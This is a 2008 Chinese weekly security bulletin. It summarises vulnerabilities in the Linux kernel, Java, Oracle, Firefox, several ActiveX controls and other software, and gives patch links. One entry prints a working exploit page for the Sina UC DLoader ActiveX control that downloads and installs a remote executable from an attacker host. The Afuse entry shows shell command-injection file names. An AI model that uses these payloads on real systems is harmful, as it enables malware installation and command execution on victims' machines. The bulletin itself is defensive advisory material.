当前位置: 安全纵横 > 安全公告

一周业界安全动态(7月14日-7月20日)

来源:安恒信息 日期:2008-07

Linux Kernel sys32_ptrace()函数多个释放后使用漏洞
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux kernel的arch/x86/kernel/ptrace.c文件中的sys32_ptrace()函数可能会溢出task_struct结构的refcount字段,本地攻击者可以在x86-64平台上利用这个漏洞触发释放后使用,导致系统崩溃。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.10.tar.bz2

 

Linux Kernel TTY操作空指针引用拒绝服务漏洞
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel没有正确地执行tty操作,本地用户可以在drivers/net/的以下文件中触发空指针引用,导致系统崩溃:
(1) hamradio/6pack.c
(2) hamradio/mkiss.c
(3) irda/irtty-sir.c
(4) ppp_async.c
(5) ppp_synctty.c
(6) slip.c
(7) wan/x25_asy.c
(8) wireless/strip.c
目前厂商已经发布了升级补丁以修复这个安全问题:
http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.10.tar.bz2

 

Apple Xcode工具.funhouse文件XML数据处理缓冲区溢出漏洞
Xcode是苹果机器上所使用的开发工具。
Xcode工具中包含有名为Core Image Fun House的示例应用程序,用于处理带有.funhouse扩展名的内容。Funhouse应用没有正确地解析XML数据,如果用户受骗打开了特制 的.funhouse文件的话,就可能触发缓冲区溢出。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.apple.com

 

Apple Xcode WebObjects WOHyperlink信息泄露漏洞
Xcode是苹果机器上所使用的开发工具。
WebObjects中包含有一个API用于通过WOHyperlink动态单元在HTML文档中生成URL。在使用时即使对于绝对URL WOHyperlink也会向所生成的URL附加会话ID,因此使用WOHyperlink创建指向其他站点的URL可能导致向该站点泄露当前用户的会话 ID。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.apple.com

 

Wireshark报文重组拒绝服务漏洞
Wireshark之前名为Ethereal,是一款非常流行的网络协议分析工具。
Wireshark在重组报文时存在拒绝服务漏洞。如果用户受骗从网络或通过抓包文件加载了一系列特制的畸形报文的话,就会在reassemble.c文件的fragment_add_work()函数中导致崩溃。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.wireshark.org/

 

Sun Java JDK/JRE多个远程安全漏洞
Solaris系统的Java运行时环境(JRE)为JAVA应用程序提供可靠的运行环境。
Sun Java中的多个安全漏洞可能允许恶意用户绕过某些安全限制、泄露系统信息、导致拒绝服务或完全入侵有漏洞的系统。
1) Java运行时环境虚拟机中的漏洞可能允许不可信任的applet读写本地文件或执行本地应用程序。
2) Java管理扩展(JMX)管理代理中的漏洞可能允许JMX客户端在运行启用了本地监控的JMX的系统上执行非授权的操作。
3) Java运行时环境的脚本语言支持中的两个错误允许不可信任的applet从其他applet访问信息、读写本地文件或执行本地应用程序。
4) Java Web Start中的边界条件错误可能允许不可信任的Java Web Start应用导致缓冲区溢出。
5) Java Web Start中的一些错误可能允许不可信任的Java Web Start应用以运行该应用程序用户的权限创建或删除任意文件,或判断Java Web Start缓存的位置。
6) Secure Static Versioning实现中的错误允许在老版本的JRE上运行applet。
7) Java运行时环境中的错误可能允许不可信任的applet绕过同源策略与运行在本地主机上的某些服务创建套接字连接。
8) Java运行时环境在处理某些XML数据时的错误可能允许非授权访问某些URL资源或导致拒绝服务。
9) Java运行时环境处理某些XML数据时的错误可能允许不可信任的applet或应用程序非授权访问某些URL资源。
10) Java运行时环境处理字体时的边界条件错误可能导致缓冲区溢出。
Sun已经为此发布了一个安全公告(Sun-Alert-238905)以及相应补丁:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-238905-1

 

Cacti多个输入验证漏洞
Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。
Cacti中存在多个输入验证错误,允许远程攻击者执行HTTP响应拆分、跨站脚本或SQL注入攻击。
1) 没有正确地过滤对多个参数的输入便用在了SQL查询中,这允许攻击者执行SQL注入攻击。
2) 没有正确地过滤对多个参数的输入便返回给了用户,这允许攻击者向用户浏览器中注入并执行任意HTML和脚本代码,或注入任意HTTP头,而该头会包含在发送给用户的响应中。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.cacti.net/release_notes_0_8_7b.php

 

Oracle 2008年7月紧急补丁更新修复多个漏洞
Oracle Database是一款商业性质大型数据库系统。
Oracle发布了2008年7月的紧急补丁更新公告,修复了多个Oracle产品中的多个漏洞。这些漏洞影响Oracle产品的所有安全属性,可导致本 地和远程的威胁。其中一些漏洞可能需要各种级别的授权,但也有些不需要任何授权。最严重的漏洞可能导致完全入侵数据库系统。目前已知的漏洞包括:
Oracle应用服务器在后端数据库安装了一些PLSQL软件包,其中的WWV_RENDER_REPORT软件包存在PLSQL注入漏洞。SHOW过程 取将要执行的函数名称作为其第二个参数,而该参数未经过滤便嵌入了PLSQL的动态执行匿名块。由于是匿名PLSQL块,因此攻击者可以通过在 execute immediate中包装语句并指定autonomous_transaction pragma来执行任意SQL语句。
Linux和Unix平台的Oracle数据库所发布的一个set-uid程序中存在安全漏洞。如果该程序加载了被替换过的模块的话,就会导致以root 用户权限执行任意代码。如果要利用这个漏洞,攻击者必须可以访问数据库所有者帐号(通常为oracle)或为oracle安装组的成员(通常为 oinstall)。
Oracle的Internet Directory服务由两个进程组成,一个为处理入站连接并将连接传送给第二个进程的监听程序,另一个用于处理请求。在处理畸形的LDAP请求时,处理 程序可能会引用空指针,导致进程崩溃。如果要利用这个漏洞,攻击者必须能够在有漏洞的服务器上创建LDAP会话,通常通过TCP 389端口或启用了SSL的TCP 636端口。
Oracle数据库产品所安装的DBMS_AQELM软件包没有正确地验证用户输入,如果远程攻击者在请求中提供了超长字符串的话就可以触发缓冲区溢出, 导致以数据库用户的权限执行任意代码。如果要利用这个漏洞,攻击者必须拥有可执行DBMS_AQELM软件包权限的数据库帐号,默认为 AQ_ADMINISTRATOR_ROLE。
Oracle已经为此发布了一个安全公告(cpujul2008)以及相应补丁:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html?_template=/o

 

Firebird多个拒绝服务及信息泄露漏洞
Firebird是一款提供多个ANSI SQL-92功能的关系型数据库,可运行在Linux、Windows和各种Unix平台下。
Firebird中的多个安全漏洞可能允许恶意的本地或远程攻击者导致拒绝服务或泄露敏感信息。
1) 处理特制表达式时的错误可能导致内存破坏。
2) 处理EXECUTE STATEMENT时的错误可能导致内存破坏和服务器崩溃。
3) 处理更改的过程时的错误可能导致崩溃。成功利用这个漏洞要求在受影响的服务器上拥有有效的Firebird凭据。
4) 创建数据库文件时分配了不正确的访问权限,允许非特权本地用户泄露数据库文件的内容。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://downloads.sourceforge.net/firebird/Firebird-2.1.1.17910-0.tar.bz2?modtime=1216050454&big_mirror=1
http://downloads.sourceforge.net/firebird/Firebird-2.5.0.20343-Alpha1.tar.bz2?modtime=1215944136&big_mirror=1

 

WinRemotePC报文处理远程拒绝服务漏洞
WinRemotePC允许用户通过局域网或者互联网控制远程计算机桌面。
WinRemotePC处理畸形用户请求时存在漏洞,如果远程攻击者向WinRemotePC Server服务(WRPCServer.exe)的默认4321/TCP端口发送了特制报文的话,就可能导致耗尽大量CPU资源。
目前厂商还没有提供补丁或者升级程序:
http://www.winsoftmagic.com/winremotepc.html

 

Mozilla Firefox URI拆分绕过安全限制漏洞
Firefox是流行的开源WEB浏览器。
Firefox可以处理来自用户或程序可访问的命令行接口的URI,如果使用管道符号(“|”)通过命令行接口向Firefox传送了多个URI的话,就 会在启动Firefox时在标签页中打开了URI。攻击者可以利用这个漏洞向Firefox传送应由其他应用所处理的URI。由于Firefox可能认为 发送的URI来自于本地内容来源,因此远程内容可以绕过基于来源的安全限制。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.mozilla.com/en-US/firefox/

 

Black Ice软件Document Imaging SDK/ActiveX控件远程堆溢出漏洞
Document Imaging SDK/ActiveX是用于帮助开发人员和程序员创建图形处理应用的软件开发工具。
Document Imaging SDK/ActiveX控件的BiGif.dll文件中没有正确地验证对OpenGifFile()函数的输入参数,如果用户受骗访问了恶意网页并向 BIImgFrm Control ActiveX控件(BIImgFrm.ocx)的GetNumberOfImagesInGifFile()方式传送了超长字符串的话,就会触发堆溢 出,导致执行任意指令。
目前厂商还没有提供补丁或者升级程序:
http://www.blackice.com/barcode.htm

 

PPMate PPMedia Class ActiveX控件远程堆溢出漏洞
PPMate网络电视是一款用于互联网上大规模视频直播的软件。
PPMate所安装的PPMedia Class ActiveX控件(PPMPlayer.dll)没有正确地处理传送给StartUrl()方式的输入,如果用户受骗访问了恶意网页并向该方式传送了超长字符串的话,就会触发堆溢出,导致执行任意指令。
目前厂商还没有提供补丁或者升级程序:
http://www.ppmate.com/

 

Mercurial patch.py文件目录遍历漏洞
Mercurial是分布式的源码管理控制系统。
Mercurial的mercurial/patch.py文件中没有正确地过滤对applydiff()函数的输入参数,如果远程攻击者提交了恶意请求的话,就可以通过目录遍历攻击重新命名代码库外任意文件的名称。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.selenic.com/hg/rev/87c704ac92d4

 

F-PROT杀毒软件CHM文件处理拒绝服务漏洞
F-Prot Antivirus是一款UNIX平台上的杀毒软件。
F-Prot杀毒引擎在解析CHM文件头时存在拒绝服务漏洞,如果文件头的nb_dir字段(根索引块的块数)值被设置为0xffffffff的话,指针计算就可能出现越界读取,导致拒绝服务的情况。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.f-prot.com/

 

Firefox CSSValue数组数据结构远程代码执行漏洞
Firefox是一款流行的开源WEB浏览器。
Mozilla的内部CSSValue数组数据结构对CSS对象的引用计数器使用了过小的变量, 如果攻击者对常见的CSS对象创建了大量引用的话,当浏览器试图释放仍在使用的CSS对象时计数器会被溢出,导致拒绝服务或在用户机器上执行任意指令。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.mozilla.org/

 

新浪DLoader Class ActiveX控件DonwloadAndInstall方式任意文件下载漏洞
新浪UC是融合了P2P思想的开放式即时通讯和娱乐平台。
新浪UC客户端所安装的DLoader Class ActiveX控件(默认安装路径%Windir%\Downloaded Program Files\Downloader.DLL)没有正确地验证对DonwloadAndInstall方式的输入,如果用户受骗访问了恶意网页并向该方式传 送了畸形参数的话,就会导致向用户系统的任意位置下载文件。目前已有蜜罐网络检测到该漏洞正在被积极的利用。
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
< HTML>< HEAD>  
<METAhttp-equiv=Content-Type content="text/html; charset=gb2312">  
< META content="MSHTML 6.00.2900.3354" name=GENERATOR></ HEAD>  
< BODY>  
< OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></ OBJECT>  
< SCRIPT>  
var YEtYcJsR1="hxxp://dddd.nihao69.cn/down/ko.exe";  
install["DownloadAndInstall"](YEtYcJsR1); 
</ SCRIPT>  
</ BODY></ HTML>
目前厂商还没有提供补丁或者升级程序:
http://www.51uc.com/

 

Velocity安全管理系统HTTP服务器目录遍历漏洞
Hirsch公司的Velocity安全管理系统是用于访问控制和安全操作的管理软件。
Velocity安全管理系统处理畸形用户请求时存在漏洞,远程攻击者可以向Velocity安全管理系统内嵌的WEB服务器提交恶意URL请求执行目录遍历攻击,导致下载服务器上的敏感数据。
目前厂商还没有提供补丁或者升级程序:
http://hirschelectronics.com/Products_One_Velocity.asp

 

CGI::Session CGISESSID Cookie值目录遍历漏洞
CGI::Session是一个Perl5库,可提供可靠易用的模块化会话管理系统。
CGI::Session没有充分的过滤CGISESSID cookie值便将其用在了File驱动中创建会话数据文件的文件名。如果远程攻击者在cookie值中注入了目录遍历序列,就会导致File驱动从配置的会话数据目录以外的任意文件读取会话数据。
仅在满足了所有以下条件的情况下才可以利用这个漏洞:
1 Web应用使用了CGI::Session中的File驱动管理会话。
2 Web应用部署于基于Windows的系统。
3 Web应用允许用户向服务器上的已知或可预测位置上传/创建/更新文件。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://fswiki.org/wiki.pl?page=%CD%FA%CE%F2%2F2008%2D7%2D16

 

Netrw Vim脚本s:BrowserMaps()函数命令执行漏洞
Netrw是一款VIM支持的远程读写文件的插件。
Netrw脚本的netrw.vim文件中没有正确地过滤某些语句:
    $ grep -n exe ~/.vim/autoload/netrw.vim|grep -v -e escape -e Decho -e
executable | wc –l
    239
当用户打开目录时,会使用execute命令加载键盘映射字符串,但没有过滤容纳当前目录名的b:netrw_curdir变量。在s:BrowserMaps()函数中:
        1709    if s:didstarstar || !mapcheck("<s-up>","n")
        1710     nnoremap <buffer> <silent> <s-up>   :Pexplore<cr>

  1. endif
  2. if g:netrw_mousemaps == 1
  3.  nnoremap <buffer> <silent> <leftmouse>   <leftmouse>:call <SID>NetrwLeftmouse(1)<cr>
  4. nnoremap <buffer> <silent> <middlemouse> <leftmouse>:call <SID>NetrwPrevWinOpen(1)<cr>
  5. nnoremap <buffer> <silent> <s-leftmouse> <leftmouse>:call <SID>NetrwMarkFile(1,<SID>NetrwGetWord())<cr>

-->  1716     exe 'nnoremap <buffer> <silent> <rightmouse>  <leftmouse>:call <SID>NetrwLocalRm("'.b:netrw_curdir.'")<cr>'
-->  1717     exe 'vnoremap <buffer> <silent> <rightmouse>  <leftmouse>:call <SID>NetrwLocalRm("'.b:netrw_curdir.'")<cr>'
        1718    endif
   -->  1719    exe 'nnoremap <buffer> <silent> <del>        :call <SID>NetrwLocalRm("'.b:netrw_curdir.'")<cr>'
   -->  1720    exe 'vnoremap <buffer> <silent> <del>        :call <SID>NetrwLocalRm("'.b:netrw_curdir.'")<cr>'
   -->  1721    exe 'nnoremap <buffer> <silent> D            :call <SID>NetrwLocalRm("'.b:netrw_curdir.'")<cr>'
   -->  1722    exe 'vnoremap <buffer> <silent> D            :call <SID>NetrwLocalRm("'.b:netrw_curdir.'")<cr>'
   -->  1723    exe 'nnoremap <buffer> <silent> R            :call <SID>NetrwLocalRename("'.b:netrw_curdir.'")<cr>'
   -->  1724    exe 'vnoremap <buffer> <silent> R            :call <SID>NetrwLocalRename("'.b:netrw_curdir.'")<cr>'
   -->  1725    exe 'nnoremap <buffer> <silent> <Leader>m    :call <SID>NetrwMakeDir("")<cr>'
        1726    nnoremap <buffer> <F1>               :he netrw-quickhelp<cr>
因此如果用户受骗打开了带有特制文件名的目录的话,就可能导致执行任意代码。
目前厂商还没有提供补丁或者升级程序:
http://mysite.verizon.net/astronaut/index.html

 

Mac OS X平台上Firefox GIF图形渲染内存破坏漏洞
Firefox是一款流行的开源WEB浏览器。
Mozilla用于在Mac OS X平台上渲染GIF图形的代码中存在漏洞,如果用户受骗打开了特制的GIF图形的话,就会释放未初始化的指针,导致拒绝服务或执行任意指令。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.mozilla.com/en-US/firefox/

 

Afuse afuse.c文件Shell命令注入漏洞
Afuse是使用FUSE在用户域实现的自动加载文件系统。
Afuse没有正确地过滤文件名便将其用在了system()调用中。如果能够读访问afuse文件系统的攻击者使用了类似于以下的路径的话:
  /path/";arbitrary command;"
  /path/`arbitrary command`
则从注册为Afuse加载的目录请求上述特制文件就会导致以提升的权限执行任意命令。
Debian已经为此发布了一个安全公告(DSA-1611-1)以及相应补丁:
http://www.debian.org/security/2008/dsa-1611

 

暴风影音2008Beta1 最新远程溢出漏洞
暴风安装目录下的 box/Stline.exe
问题模块是暴风的视频加速程序,暴风的视频加速功能是通过设置浏览器代理实现的,这个代理服务器(HttpServer.dll)会在本机开 8089 端口监听处理请求,因为此端口绑定的地址不是localhost, 从而导致此溢出可以被远程利用。
发生异常的函数是在 unknown_libname_98 里,而 unknown_libname_98是 _vscan_fn 的回调,通过sub_1003AE2C 参数判断这个是正则表达式 search 函数,溢出正是在这个函数里面发生。
目前厂商还没有提供补丁或者升级程序:

http://www.baofeng.com